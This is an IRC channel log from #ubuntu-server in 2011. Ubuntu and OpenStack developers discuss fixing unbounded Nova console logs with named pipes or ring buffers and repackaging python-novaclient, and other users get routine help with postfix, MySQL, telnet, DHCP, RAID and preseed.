<Daviey> koolhead11: Pretty gooooood!
<just-a-visitor> I'd check the actual source code, since it seems to be quite dated. :-)
<uvirtbot> New bug: #841672 in openssh (main) "ssh-add does not unlock ssh keys" [Undecided,New] https://launchpad.net/bugs/841672
<Daviey> rbasak: hello sir!
<Daviey> How did you get on with qemu-system-arm, and the cloud image?
<rbasak> Daviey: waiting to sync with utlemming!
<rbasak> He found another option and went off to work on it
<Daviey> rbasak: ah! nice.
<Daviey> Sadly, he won't be around today
<rbasak> hmm
<Daviey> rbasak: I remember you sniffed bug 832507
<uvirtbot> Launchpad bug 832507 in nova "console.log grows indefinitely" [High,In progress] https://launchpad.net/bugs/832507
<Daviey> did you get an idea for a cleaner fix, than my non-ideal one?
<rbasak> I haven't managed to figure out where exactly the console.log gets written out from
<rbasak> I think it's in libvirt rather than qemu
<rbasak> In which case I think libvirt should be enhanced to provide a ringbuffer option
<soren> Daviey: I thought you said you found a solution for that one?
<rbasak> Would you like me to carry on looking down this route?
<Daviey> soren: Well my solution cannot be default, as it uses a non-mainline (or -dkms packaged) kernel module.
<soren> Daviey: Oh, I thought you went down a different path. Ok.
<Daviey> soren: I'm hessitant to maintain code i'm not familar with.
<Daviey> soren: well rbasak seemed to think he'd be able to find a proper fix :)
<Daviey> soren: The solution in the branch attached, 'works' - but i've not yet decided if to merge propose it.
<Daviey> if all else fails, at least it's /something/.
<rbasak> Daviey: OK I'll carry on then :)
<Daviey> rbasak: That might be useful.. it's a pretty serious bug. :/
<soren> Daviey: I think I have a much simpler solution.
<soren> Daviey: Give me a couple of minutes to validate it.
<Daviey> soren: You can't just say that.... need detail man!
<Daviey> i'm sat on the edge of my chair awaiting detail.
 * soren whistles innocently
<soren> Yup.
<soren> it works.
<soren> If we tell kvm to talk to a named pipe, it'll buffer the output if we're not listening.
<soren> ..and if we stop listening, it starts buffering again, and will flush the cache when we start listening again.
<soren> So we can just use the code that I wrote to support Xen.
<soren> ...and add some expiry stuff to it.
<soren> The point is, not listening doesn't block kvm.
<soren> I'm not sure how or why it works. When I looked at the source code, it didn't seem to have a buffer mechanism or reconnect handling or anything like that.
<soren> ...but I can see it working.
 * soren wonders if Daviey fell off that chair
<Daviey> i sure did
<Daviey> soren: Does kvm action the SIG* to terminate if the sink goes away?
<soren> I'll let you reread what I just said.
<soren> :)
<soren> Ah.
 * soren spots the ambiguity
<soren> No, it does not.
<soren> When I said "if we stop listening" I meant: If I kill the "cat pipe.out" that's been running...
<Daviey> as in, if you are thinking to just connect to the pipe when i run euca-get-console-output, does kvm die following that command?
<soren> 10:24 < soren> No, it does not.
<soren> 10:24 < soren> When I said "if we stop listening" I meant: If I kill the "cat pipe.out" that's been running...
<soren> :)
<Daviey> soren: Okay.. and you can limit the size of the fifo?
<soren> We could connect to the pipe on GetConsoleOutput as well as once a minute (to avoid kvm's buffer for this growing out of hand).
<soren> Daviey: I don't think so, no. I don't see the size of the buffer mentioned anywhere much less documented how you can change it.
<Daviey> It actually sounds easier to add ringbuffer support to kvm IMO :)
<soren> Using this approach, I can hack this together in an hour or so.
<Daviey> Note, that in order to be compariable to AWS - it should output the last 64K.
<soren> We can get the EC2 API to chop it off at 64k.
<Daviey> I don't know what the behaviour is if i push 10TB to the console, sure the instance will hurt; but what does it do when flushed?
<soren> I don't want to impose that particular limitation further down the stack. Keeping an MB or even a couple per VM shoulnd't be a problem at all.
<soren> ...but sure, we should have a limit.
<soren> I just believe that when you decide to impose arbitrary limits, they should be really high.
<Daviey> But does that limit mean that it is chopped in nova-compute?
<Daviey> Possibly expensive?
<soren> Hardly.
<soren> In the grand scheme of things, it's miniscule.
<Daviey> nice overcomplicated tail, http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
<rbasak> If we did use a ringbuffer, we'd want that CPU of chugging through 10TB to be accounted for in the guest properly, ie. the host shouldn't struggle to complete other tasks
 * rbasak is still struggling through entirely undocumented code
<soren> You're talking over the internet to an API server that looks things up in a database, sends an AMQP message to a compute server that probably also looks stuff up in a database and then sends a response all the way back. Reading a megabyte from the filesystem and truncating it down to the last 64k isn't a big deal.
<Daviey> "the code is the documentation" etc
<Daviey> :/
<rbasak> Are we talking about the same thing?
<rbasak> I always assumed that the issue is that the guest can DoS the host by filling up its disk
<soren> right
<Daviey> rbasak: Soren is thinking of using a fifo, which should hurt the instance - not the host.
<Daviey> as in, the yet-to-be-discovered bugger in kvm filling up and killing the instance.
<Daviey> err, buffer.
<rbasak> what would be reading the fifo?
<soren> Daviey: Actually, it might just be that kvm does this in a separate thread.
<Daviey> I always thought fifo's were fragile for this sort of usecase tbh.. but i am happy to be proved wrong.
<soren> Daviey: ...so it doesn't block all of kvm, only the thread that is waiting to write to the fifo.
<Daviey> soren: Stop getting distracted, we can sniff your diff :)
<soren> Daviey: Well, they're only fragile if either end thinks it's talking to something else.
<Daviey> rbasak: Either, when making a request - flush the pipe and/or have a 60s flush process.
<rbasak> so the thread has an internal buffer of some form that it writes to the fifo from, and other threads in kvm are writing to it?
<rbasak> what happens when that buffer fills?
<soren> Daviey: If everyone knows they're taling to a fifo, the semantics are well understood and pretty easy to deal with.
<Daviey> rbasak: *every 60s flush.
<Daviey> rbasak: NFI.
<soren> Attempts to write to it will err.
<Daviey> suck it and see.. i'm expecting a blocker, but i'll be more than pleased if not. :)
<soren> According to pipe(7), the size of the buffer is 65536.
<soren> Daviey: Sniff my diff? I'm not writing anything right now. I've got a couple of other pressing matters I need to attend to first, but I'd be happy to answer questions along the way if someone wants to take a stab at this.
<Daviey> soren: ok
<soren> One thing that would probably be helpful to know from the start: Each server in Nova has a periodic_tasks method that gets called every minute or so.
<soren> So no need to worry about inventing something for that.
<Daviey> soren: how do you register an event with that?
<Daviey> just something to grep for. :)
<soren> Daviey: You don't. You just override that method and add more calls to it.
<soren> We don't really have an (internal) events system like that where you can subscribe to particular events or whatnot.
<rbasak> one thing I find really annoying about ec2 is that it takes ages for it to update console output
<rbasak> it'd be nice if it was instant :)
<soren> openstack's impl is instantaneous
<soren> That's a particular place where I explicitly don't want feature parity with EC2 :)
<soren> i
<soren> whoops
<Daviey> rbasak: Yeah.. would be easier to do post run-instance magic based on console output.
<Daviey> For example, smosers ssh fingerprint magic.
 * rbasak does something like that on EC2
<rbasak> I patched python-boto years ago
<soren> I'm guessing Amazon must store that off of their "compute nodes". Otherwise I don't see why they'd want to limit the number and frequence of console output updates so drastically.
<rbasak> but it's too slow due to the console update delay :-/
<soren> q
<soren> whoops
<rbasak> it looks to me like libvirt has some kind of stream abstraction. Is this what it's using to get the console output from kvm?
<soren> Are you trying a different approach? Or why are you looking at libvirt code?
<rbasak> I'm still thinking about a ringbuffer approach, but mainly I'm still trying to find my way round so that I can understand whichever approach better. I don't yet have a full picture of where console output goes currently
<soren> At the moment, the serial port of the virtual machine is configured to go to a file.
<soren> This is done in the XML defining the VM.
<soren> rbasak: http://libvirt.org/formatdomain.html#elementsConsole
<rbasak> yep I'm looking at that thanks
<rbasak> So that's read by libvirt - how does it arrange that to happen?
<rbasak> does libvirt open a file and pass kvm the fd, or does it give kvm a pts and read it through to a file, or something else?
<soren> For qemu, I believe all those things are done by passing the relevant arguments to qemu on the command line.
<rbasak> so it passes the filename directly?
<rbasak> (and qemu opens it?)
<soren> Yes.
<soren> rbasak: You should be able to just specify a named pipe in the XML and have everything work out.
<rbasak> <soren> Daviey: If everyone knows they're taling to a fifo, the semantics are well understood and pretty easy to deal with.
<rbasak> does that apply to qemu?
<soren> yes
<rbasak> what will qemu do on a SIGPIPE/EPIPE?
<soren> It ignores it, AFAICT.
<soren> Er..
<soren> sorry, no.
<rbasak> and loses the write?
<soren> It ignores SIGPIPE.
<rbasak> and is that well defined or might the behaviour change in future?
<soren> This is free software. There are no guarantees :)
<rbasak> :-)
<soren> If we want it to not change, we just use it and complain if it breaks at some point.
<rbasak> soren, what do you think about this named pipe approach vs. modifying something to write out a ringbuffer?
<rbasak> or even, giving qemu a fifo but reading the fifo and writing out a ringbuffer
<soren> ringbuffers are kinda hard to "write out" :), but having a ring buffer implementation in kvm would be sort of neat. It's much more work than just using a named pipe, though.
<soren> ...and I think using a named pipe (now that we know it behaves well) is perfectly fine.
<rbasak> the bit of ringbuffering into a file that I see as untidy would be the head/tail pointers
<rbasak> I suppose a couple of integers at the start of the file would do, but then it's suddenly a binary format
<soren> That's why ringbuffers aren't written to files.
 * rbasak was thinking about mmapping a file
<soren> Truncating files by chopping stuff off of the end of them is easy. Moving their starting point forward isn't.
<rbasak> then another process could read out the current state quite easily
<rbasak> struct { int head, int tail, char data[] }
<rbasak> assuming ints are atomic on writes
<rbasak> then a writer would just need to order changes carefully
<soren> You'd only need a start ptr, really.
<soren> Well, and perhaps a max_length.
<rbasak> then the first write run through would have to be a special case
<rbasak> anyway, that's just the detail
<rbasak> it's still ugly I admit :)
<rbasak> I'm thinking of something like <console type='pty'><source path='/tmp/console.log' ringbuffer='16384' /><target type='virtio' port='0'/></console>
<rbasak> Hence looking at libvirt, and if libvirt could manage taking input from qemu and dealing with the ringbuffer, then it would fit in really well
<rbasak> If the ringbuffer isn't a file then maybe memory but then it'd need some kind of API to get it out again
<rbasak> are we allowed to use pthread mutexes in libvirt?
<uvirtbot> New bug: #841726 in cobbler (universe) "Unable to netboot with dhcpd managed by cobbler" [Undecided,New] https://launchpad.net/bugs/841726
<Daviey> jamespage: stop finding issues :)
<jamespage> Daviey: sorry
<jamespage> my preseed seem to be broken now as well - gah!
<Daviey> rbasak: it has case history, so i assume yes - http://www.redhat.com/archives/libvir-list/2011-January/msg00965.html
<Daviey> rbasak: Note, that this would probably have to be accepted upstream before we could carry it.
<eagles0513875> any people well versed with dovecot and postfix running on 10.04
<Daviey> eagles0513875: many people are probably well versed in this.
<soren> rbasak: libvirt has e.g. virMutexLock, which I believe is a thin wrapper around pthread mutexes.
<soren> rbasak: Remember, though, that libvirt supports stopping libvirt while letting the VM's keep running.
<eagles0513875> Daviey: well my issue is this. on 10.04.2 i got everythign working etc and now reconfiguring dovecot and postfix configured the exact same way
<eagles0513875> Daviey: yet all emails get delivered to /var/mail instead of my maildir
<soren> rbasak: So anything you do should either not require libvirt to run for kvm to also keep running.
<rbasak> soren: ah, I was wondering about that, thanks. So with your named pipe system, nova would give libvirt a path to a named pipe, and take care of reading it itself? Would that include a persistent process/thread to read, or would you be relying on qemu not breaking when it tries to write to the pipe with no reader?
<soren> rbasak: I'd rely on qemu not to break.
<rbasak> ok thanks
<soren> We trust Qemu to do everything else properly. If qemu breaks, we're so utterly screwed anyway :)
<Daviey> soren: talking of which.. pondering a new upstream version.. 0.15 was released a while ago.
<Daviey> *very* late in the cycle. :/
<rbasak> yeah I understand but it's kind of broken to expect a random application to know what to do when faced with EPIPE :)
<rbasak> (but if it works atm then fair enough I guess)
<soren> rbasak: Why?
<kvarley> I get "ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)" when I try and login to mysql on my machine. what am I doing wrong?
<soren> rbasak: qemu isn't exactly a random application. It's *the* application.
<koolhead11> kvarley: is this server not on same system
<kvarley> koolhead11: I'm running a LAMP server setup on localhost.
<koolhead11> kvarley: what does mysql -uroot -p <yourpassword> does ?
<kvarley> koolhead11: Produces that error
<rbasak> soren: because by default applications won't watch SIGPIPE, and it's a special case to have to deal with it. If qemu deals with it by definition because someone considered writing to FIFOs, then fair enough. If we're lucky that it works, then also fair enough but we're still lucky that it works :)
<rbasak> s/watch/catch
<koolhead11> kvarley: https://help.ubuntu.com/community/MysqlPasswordReset see if it helps!! :D
<kvarley> koolhead11: I got in :) Thanks for the help tho! :)
<uvirtbot> New bug: #813317 in asterisk (universe) "package asterisk-config 1:1.6.2.5-0ubuntu1.4 failed to install/upgrade: EOF on stdin at conffile prompt" [Low,New] https://launchpad.net/bugs/813317
<koolhead11> kvarley: its great the community documentation and take googles help :D cheers!!
<Ursinha> good morning people
<Daviey> Ursinha: Hello!
<tdn> I have installed mysql server using apt-get. Now there is set a password for user debian-sys-maint. How do I get this password?
<just-a-visitor> Try looking into /etc/mysql/debian.cnf.
<aveng3r> Hi, I'm using ubuntu 11.4 server, is there a way to install xorg?
<just-a-visitor> https://help.ubuntu.com/community/ServerGUI
<aveng3r> thanks
<eagles0513875> hey guys i need some help with postfix
<Ursinha> bug 833499
<uvirtbot> Launchpad bug 833499 in nova "virt/disk.py unconditionally inserts  public_keys into /root/.ssh/authorized_keys" [High,New] https://launchpad.net/bugs/833499
<eagles0513875> hey guys im setting up post fix what should the postmaster and root email be set to the system users email address?
<eagles0513875> any postfix experts in here i need some help
<eagles0513875> i changed a line in saslauthd and for some reason it doesnt like said line
<eagles0513875> its failing to start saslauthd
<memoryleak> and why does it this?
<eagles0513875> memoryleak: ??
<yaboo> trying to setup a telnet server on my box, can telnet localhost, but am unable to telnet from another machine
<yaboo> do I need to activate something?
<memoryleak> eagles0513875: I can't do some voodoo and guesss what the problem might be. Paste changed lines, and the Error message(s).
<eagles0513875> memoryleak: i pasted a line from the ubuntu wiki on how to set this up
<eagles0513875> yaboo: if your trying to telnet to another machine it woudl be telnet IP PORT
<memoryleak> eagles0513875: Still not enugh info to help you.
<yaboo> eagles0513875, getting connection refused, switched off firewall believe, but still no dice
<eagles0513875> memoryleak: what info do you need
<eagles0513875> yaboo: can you ssh into the remote machien and try telnet ip port
<memoryleak> Error message? What you changed?
<eagles0513875> telnet localhost ip port
<eagles0513875> memoryleak: in the saslauthd file i changed the very last line to OPTIONS="-c -m /var/spool/postfix/var/run/saslauthd"
<eagles0513875> when it comes to starting it
<yaboo> eagles0513875, can ssh into the machine, from other machine, I get connection refused
<eagles0513875> yaboo: are you the admin of the remote machine
<eagles0513875> memoryleak: i get this error when i try to start it /etc/default/saslauthd: 59: Syntax error: Unterminated quoted string
<yaboo> eagles0513875, yes
<eagles0513875> yaboo: can you login to the machine and do sudo iptables -L and check that port 22 is open
<yaboo> eagles0513875, iptables -L returns blank
<eagles0513875> yaboo: then sudo apt-get install openssh-server
<yaboo> eagles0513875, defeats the purpose of telnet
<eagles0513875> yaboo: what do you need telnet for anyway
<eagles0513875> its hardly used and not very secure
<yaboo> eagles0513875, a inhouse app using wyse60 emulation
<eagles0513875> yaboo: you have any routers along the way between  you and ur server?
<eagles0513875> it could be the router is blocking the port
<memoryleak> eagles0513875: Look for qoute chars that are not enclosing
<eagles0513875> or the whole network firewall
<eagles0513875> memoryleak: it specifically says line 59
<yaboo> eagles0513875, no, same network, netmask
<memoryleak> eagles0513875: Post the whole file on pastebin.com
<eagles0513875> memoryleak: found it
<eagles0513875> yaboo: doesnt matter same subnet or not
<yaboo> ok eagles0513875
<eagles0513875> if the entire network firewall doesnt have it opened you wont have access via telnet
<memoryleak> eagles0513875: Basically, it told you allready what was wrong. You just didn't look.
<eagles0513875> memoryleak: the way i interpreted it it said line 59
<eagles0513875> yet the error was further up then line 59
<eagles0513875> near the top
<memoryleak> Your'e not the first that thid this mistake in the config :D
<yaboo> eagles0513875, got it working, seems inetd only allowed tcp6, installed xinetd and works in tcp4 and able to telnet into the machine
<eagles0513875> yaboo: ahh
<eagles0513875> memoryleak: you did same mistake as me
<koolhead17> hi all
<KoolaidJunkie> Could someone help me get a script to start on boot up?
<fedup> so I have a fresh install of 10.4.3 server, I want it to be a dhcp server and file and LAMP. for dhcp where sould I start? dhcp3-server, dnsmasq, or dhcpd
<zoopster> fedup: I'm using dhcp3-server
<qman__> I also use dhcp3-server, but if you're looking for dynamic DNS on your LAN, dnsmasq is going to be the better option
<qman__> it can be done with other servers and BIND, but dnsmasq is tailored for that kind of setup
<erty> hi
<erty> i got pc with pc with 2 disk
<erty> with 2 disk 76 GB
<erty> i got raid 1 on it
<erty> what it will be the volume of my disk ?
<fedup> hmmm ok
<pmatulis> sounds like homework
<erty> yeah  anyone can tell ?
<fedup> dnsmasq will do dhcp ip's and be able to support a wirelss access point?
<qman__> your chosen DHCP server really doesn't have anything to do with using a wireless access point
<erty> anyione there
<erty> .?????
<fedup> k
<fedup> wasn't sure, I guess not with it just being a static ip
<lickalott> erty you have a question?
<erty> yes of course
<erty> 2 disk of 76 GB with raid how much the total volume ?
<erty> raid 1
<jmarsden> erty: 76GB.  Is this a trick question? :)
<erty> well with raid 10 how much it gives ?
<jmarsden> With RAID 10 you ned 4 disks.  so that one *is* a trick question!
<erty> well if you create raid 1 on 76 GB
<erty> as OS if you got ubuntu
<erty> from the OS is it possible to check the type of raid created before ?
<jmarsden> erty: Software RAID: read /etc/mdadm/mdadm.conf.  Hardware RAID: see how the RAID controller is configured using whatever tool or utility it uses.
<erty> if i understand correctl, if it is an hardware raid, from the OS we can't access to type of raid
<erty> am i correct ?
<jmarsden> You can get a utility that knows about the hardware RAID controller and use that to look at how the controller is set up.
<erty> lets take an example of HP SERVER
<erty> what utility knows about the hardware RAID controller and use that to look at how the controller is set up ?
<jmarsden> It is not the server that matters, it is the controller.
<jmarsden> Which controller card do you have?
<erty> smart array controller
<jmarsden> Maybe, this is relevant to you: http://h18000.www1.hp.com/products/servers/proliantstorage/software-management/acumatrix/index.html
<jmarsden> No, that is not a specific controller name :)
<jmarsden> HP makes a bunch of "smart array controllers", I think...
<jmarsden> The Ubuntu package cciss-vol-status  may also be relevant?
<erty> well can you give me a clue ?
<jmarsden> I just gave you a bunch of clues.  Use them.
<erty> well, always with the same disk with raid 1
<erty> 2 disk of 76 GB raid 1
<KoolaidJunkie> Hey everyone.
<KoolaidJunkie> How can I get a script to run on server boot?
<erty> when you booting to the OS, if you do fdisk -l how many disk it will detect ?
<jmarsden> erty: try it and see :)
<erty> don't have any hardware
<erty> to try that's why i m asking you here ? pppl :)
<erty> just want to understand the concept before buying
<jmarsden> <pmatulis> sounds like homework <erty> yeah  anyone can tell ?
<jmarsden> That does not look like pre-sales evaluation to me...
<erty> homework for myself
<erty> don't worry ; There is no ambiguity
<erty> so how much it gives with fdisk -l ?
<jeeves_moss> is there an easy way to send an e-mail from a predefined e-mail account (on the local server), but to have the body of the e-mail pulled from a txt file?
<jmarsden> jeeves_moss: mail -f predefined@example.com -s "some subject" recipient@example.com <somefile.txt
<jeeves_moss> jmarsden, thank you.  that's the simplest
<jmarsden> Well, you can leave out the -s "some subject" to simplify it further :)
<jeeves_moss> thanks.  my ISP's tech support is refusing to fix an issue that's been going on for 6+ months, so I figure an e-mail every 15 mins should get their attention
<jeeves_moss> sorry, connection issues
<jeeves_moss> it dosn't like the "-f" command for the "from" user
<jeeves_moss> jmarsden, are you stil here?
<jeeves_moss> is there an easy way to send an e-mail from a predefined e-mail account (on the local server), but to have the body of the e-mail pulled from a txt file?
<lickalott> redirectors i would assume
<bcessa> hi, what software do you recommend to monitor a ubuntu server with: nginx, php5-fpm, mysql ?
#ubuntu-server 2011-09-06
<twb> Does ubuntu use insserv yet?
<jmarsden> twb: /sbin/insserv exists in Lucid, if that helps answer the question.
<twb> Not really; I mean, upstart exists in Debian but it isn't really used
<twb> I suspect insserv will actively do the wrong thing because enough of the init jobs are in upstart now
<jmarsden> OK.  You could  apt-get pruge insserv    and then reboot and find out :)
<twb> jmarsden: it's provided by sysvinit
<twb> Oh, apparently not.
<jmarsden> Not on my machine :)
<twb> I guess because insserv only triggers when a new sysvinit job is installed, rather than during boot (cf. startpar).
<Error404NotFound> I am trying to setup nginx with php-fpm but can't find the package, even tried couple of ppa. The best one was nginx/php but that has php package, not fpm one. Do i need to install php5-cgi and use custom init script?
<uvirtbot> New bug: #842400 in nagios3 (main) "package nagios3-common 3.2.0-4ubuntu2.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/842400
<Error404NotFound> found it
<Daviey> rbasak: Fancy setting up a new upstream version of python-novaclient?
<rbasak> Daviey: sounds familiar :)
<upp> hello, i want to creat intranet, so what's the best solution to do it?
<rbasak> Daviey: any reason in particular I should be mentioning in the changelog?
<Daviey> rbasak: That you or zul failed to see if it built locally before uploading it?
<rbasak> :-(
<Daviey> Or, that upstream project doesn't use a gated trunk - and someone checked in broken code?
<Daviey> either way :)
<rbasak> looks like it's broken upstream to me
<Daviey> Oh yeah, about 3 commits after the one uploaded the fix is there.
<Daviey> rbasak: btw, mentioned "LP: #838298" in the bug, and the issue you resolved will be closed automagically.
<rbasak> Daviey: the latest snapshot they have is ~bzr110, dated 2/9 2141. Will that do?
<Daviey> rbasak: looks like it was fixed in 108, http://bazaar.launchpad.net/~jk0/python-novaclient/master/revision/108
<Daviey> so bzr110 looks super
<Daviey> For interest, you can see the build log https://launchpad.net/ubuntu/+source/python-novaclient/2.6.4~bzr106-0ubuntu1/+build/2761697
<rbasak> yep seen it
<rbasak> Is there an FTBFS bug to close?
<Daviey> nah, you can open one if you want.
<Daviey> i'd be tempted not to bother. :)
<rbasak> I was gonna say that, seems a bit pointless :)
<Daviey> rbasak: Yeah, some people do that so they can increase their "bug closed" count.
<rbasak> :-/
<rbasak> This split out debian/ thing is a bit annoying. Is there  an automated way to test the build locally without doing it all manually?
<twb> rbasak: as in debian/ is a separate VCS repo?
<Daviey> normally. :)
 * Daviey looks
<rbasak> twb: yes
<twb> I do that at http://darcs.debian.org/collab-maint/mg -- look at get-orig-source for the minimal workaround I have
<twb> That's get-orig-source in debian/rules
<rbasak> thanks
<Daviey> I was ust checking if we had that :)
<rbasak> that looks slightly mg-specific
<twb> Yes, well
<twb> I'm sure you can mangle it to your own use case
 * rbasak doesn't yet understand the purpose of splitting it out like that
<twb> the tar part is portable enough
<twb> rbasak: splitting them out and using quilt to merge is simpler than learning to use a tool like git-buildpackage or svn-buildpackage
<twb> rbasak: and since 3.0 (quilt) format guarantees that debian/ contains the entire debianization, it's safe to do
<rbasak> It doesn't feel simpler to me right now! I guess I need to learn quilt
<twb> Are you coming from gbp, or what?
<rbasak> I am
<twb> Obviousl once you've made that learning hurdle, it looks easy :P
<rbasak> I accept that git is hard to learn
<twb> I can manage basic git, but I wanted to do packaging, not learn how to deal with branching and merging and shit
<rbasak> but I think that it is only hard because it reflects the true structure of any DVCS
<rbasak> instead of doing it in one tool we do the same thing out of band manually and with lots of messing around
<twb> I was especially disappointed because gbp and friends' documentation want the upstream branch to only have the tarball releases in it
<rbasak> just without realising what what we're doing is exactly all the same branching and merging and shit
<twb> If it was obvious and easy to just maintain the debian version as a branch of upstream's dev repo, it would be more attractive
<twb> rbasak: well, it's "out of band" in the sense that quilt does it.
<rbasak> That's what I always did
<rbasak> Not sure what you mean by only having tarball releases in it
<twb> rbasak: the *bp docs I've read all say "get upstream's tarball, and commit it"
<twb> rbasak: they don't say "git clone upstream, then make a new branch for debian"
<rbasak> Ah
<rbasak> AIUI, the two are identical
<twb> They're very definitely not
<twb> e.g. git log will not show you any of the upstream patches
<rbasak> For the purposes of gbp they are identical
<rbasak> I realise that it's different for git
<rbasak> but gbp will work just find if upstream is a remote tracking branch
<rbasak> (AFAIK)
<rbasak> s/find/fine
<twb> Maybe, but remember that when I was looking at this I also wasn't really familiar with git
<rbasak> I presume the reason the docs are written that way is that most upstreams aren't git repos
<twb> I felt like I was going against the grain of gbp/sbp and I knew a separate debian/ repo would Just Work
<rbasak> with quilt, surely we're stuck using tarball releases anyway?
<Daviey> rbasak: http://pb.daviey.com/XvE0/
<twb> rbasak: yes, but it doesn't try to be clever, it just works, and there's very clear separation between upstream, debian/ and debian/patches
<rbasak> sure
<rbasak> it's that clear separation that I'm finding a right pain
<Daviey> rbasak: that is /one/ way of doing this
<twb> I'm not saying you're wrong, I'm just saying that this is how I did it, and why
<rbasak> OK :)
<Daviey> rbasak: actually, i didn't need to pull-lp-source
<rbasak> Daviey: that's very different from what zul showed me!
<Daviey> rbasak: it's /another/ way :)
<Daviey> rbasak: ask twb says, there is a pretty standard convention of having a get-orig-source target in debian/rules... which allows you to do, "debian/rules get-orig-source" , but that hasn't been done for this package.
<twb> Well, there's a convention that get-orig-source does *something*, and that debian/README.source documents *something*
<twb> I would be wary of running get-orig-source of a new package without reading it first ;-)
<rbasak> python-novaclient: remote site does not even have current version
<rbasak> what's what about?
<rbasak> debian/changelog says 2.6.4~bzr106-0ubuntu1
<twb> rbasak: that would be saying that upstream hasn't released the version corresponding to your debian/changelog yet.
<rbasak> http://nova.openstack.org/tarballs/python-novaclient-2.6.4~bzr106.tar.gz exists
<twb> rbasak: i.e. it's trying to download 2.6.4~bzr106.tar.gz
<twb> Dunno, then, run uscan --debug or so
<twb> uscan --verbose?  Whatever
<Daviey> might be a bug in the debian/watch file
<Daviey> shrug
<twb> Yea
<rbasak> should the watch file refer to pypi?
<twb> Fuck I know, is your debian source package visible somewhere I can dget?
<rbasak> https://launchpad.net/ubuntu/oneiric/+source/python-novaclient/2.6.4~bzr106-0ubuntu1/+files/python-novaclient_2.6.4~bzr106-0ubuntu1.dsc
<rbasak> Upstream snapshot source is  http://nova.openstack.org/tarballs/ AIUI
<twb> uscan wfm there
<Daviey> it worked for me aswell, but did give a false warning
<rbasak> I get http://paste.ubuntu.com/683282/ - is that the same?
<twb> Probably because there's two URLs there
<Daviey> ttx: I see you are Marked as maintainer for this package.. Do you want that to be kept?
<twb> So it can't find it on the first site, and tries the second
<rbasak> Argh
<rbasak> it's not piping the entire output when not connected to a terminal
<twb> Yay reading :P
<twb> rbasak: ew
<twb> rbasak: report that as a bug
<rbasak> Oh
<rbasak> No, uscan just doens't do what I thought it would do
<rbasak> Which part of name uscan suggests that it should have side effects?
<rbasak> (I assumed that running uscan multiple times would have the same result)
<rbasak> Even the manpage synopsis suggests that
<koolhead11> hi all
<Daviey> rbasak: Really, the debian/control should also have - http://pb.daviey.com/qQ2c/ - so drive by developers know where they should propose fixes to the packaging
<rbasak> Daviey: ah yes, I was asking zul the other day how I was supposed to know where to get the bzr branch from
<Daviey> gah
<Daviey> http://pb.daviey.com/vJ3f/, rather
<rbasak> OK it builds this time
<Daviey> \o/
<Daviey> rbasak: do you want to post a debdiff somewhere?
<rbasak> I'll push to my bzr branch if that's OK, that's what I did last time with zul
<ttx> Daviey: no
<Daviey> twb: fancy tackling a bug? :)
<Daviey> rbasak: that is fine.
<twb> I'm going home in a minute, so you have, like, twenty seconds to sell me on it
<Daviey> ttx: python-novaclient isn't gated, it's had test suite failed commits pushed to it.  This is why gated trunk is good. :)
<Daviey> is it a 'core' project?
<Daviey> twb: ah! Maybe next time.. :)
<twb> Whatever dude
<rbasak> Daviey: should I keep pypi in debian/watch?
<rbasak> Daviey: it seems out of date?
<koolhead11> My install gets ceased if DHCP fails to assign IP and i have to retry after pressing/selecting the appeared option during cobbler provisioning for Oneiric. Am i  the only one getting this issue ?
<Daviey> rbasak: it's not hurting
<koolhead11> *selecting the DHCP assign option.
<Daviey> rbasak: it probably will be updated at some point, so it does work
<Daviey> koolhead11: funny you say that!
<Daviey> koolhead11: what hardware is this?
<ttx> Daviey: it's not core -- but in some way it should be
<koolhead11> Daviey, lemme pastebin it.
<rbasak> Daviey: pushed to https://bazaar.launchpad.net/~racb/%2Bjunk/python-nova-client/
<koolhead11> Daviey, am wrongly explaining i think :D
<koolhead11> its like if DHCP fails via provisioning and then i again ask him for assigning the IP once it assigns the IP whole process ceases
<koolhead11> Daviey, http://paste.ubuntu.com/683311/  The card
<Daviey> koolhead11: process ceases?!
<Daviey> or it works on attempt #2?
<rnz> hi all
<koolhead11> Daviey, it gets the ip and then ceases :D
<Daviey> koolhead11: I've come across a class of hardware that takes too long to get an IP addresses and the on board pxe fails.. but you have got into the installer ok.
<rnz> anybody know how to disable putting daemon scripts to autostart on install step (configure apt or dpkg)
<rnz> &
<Daviey> koolhead11: This certainly sounds like it could be a bug..
<rnz> ?
<koolhead11> Daviey, the PXE has not failed in my case but took hell lot of time.
<Daviey> koolhead11: Could you raise one against debian-installer, and try and add as much info/logs from the installer as possible?
<rnz> anybody know how to disable putting daemon scripts to autostart on install step (configure apt or dpkg)?
<koolhead11> Daviey, i can do that. log will not be possible because the system ceases in middle and i have to reboot the system.
<Daviey> koolhead11: local or remote?
<GeorgeJ> ello folks, I've just installed virtualmin and I want to have multiple versions of php installed. Is it possible to have multiple versions installed? If so, could you point me in the right direction?
<koolhead11> Daviey, the local system
<Daviey> koolhead11: Someone from the foundations team might be better at helping to debug this.. Open a bug report with waht you can :0
<koolhead11> Daviey, ok.
<koolhead11> Daviey, and am really stuck with the custom partition using preseed
<koolhead11> :(
<Daviey> Didn't this come up yesterday?
<Daviey> hmm
<Daviey> what do you mean by custom?
<koolhead11> nopes
<eagles0513875> hey guys is there a ppa with an updated version of make
<eagles0513875> for lucid
<koolhead11> http://paste.ubuntu.com/683346/
<koolhead11> Daviey, i put paste of what came as output and what i assigned in preseed
<koolhead11> i just need a root a swap and rest a free extended partition :D
<koolhead11> just-a-visitor, hey
<just-a-visitor> Hello koolhead11
<koolhead11> just-a-visitor, still struggling there :(
<just-a-visitor> Well, I have searched for that info on Google. :|
<koolhead11> just-a-visitor, :D
<just-a-visitor> Read somewhere, that if you put everything on one line it might work, but I am still looking for the article.
<koolhead11> k
<koolhead11> am leaving that section and manually run it unless i figure the issue. i have allready wasted 2 days :(
<rnz> anybody know how to disable putting daemon scripts to autostart on install step (configure apt or dpkg)?
<_ruben> rnz: you'd probably have to edit the package (get source package, apply change, re-package)
<GeorgeJ> How would one install php 5.2.8 on ubuntu server 11.04?
<rnz> _ruben - I think this bad idea
<rnz> How about if  i need disable for all installing daemons?
<just-a-visitor> koolhead11 I am sorry, that I cannot help you more. You know, just a visitor.
<_ruben> rnz: then i'd say you're an unlucky person ... or just be less lazy and disable said daemons after installing 'em
<koolhead11> just-a-visitor, dont be only that. :D
<just-a-visitor> Well, I'm trying... ;-)
<rnz> _ruben - i think you don't understand - apt-get install app - app add to starup and start - but server don't need to auto start them. and nothing to do with laziness
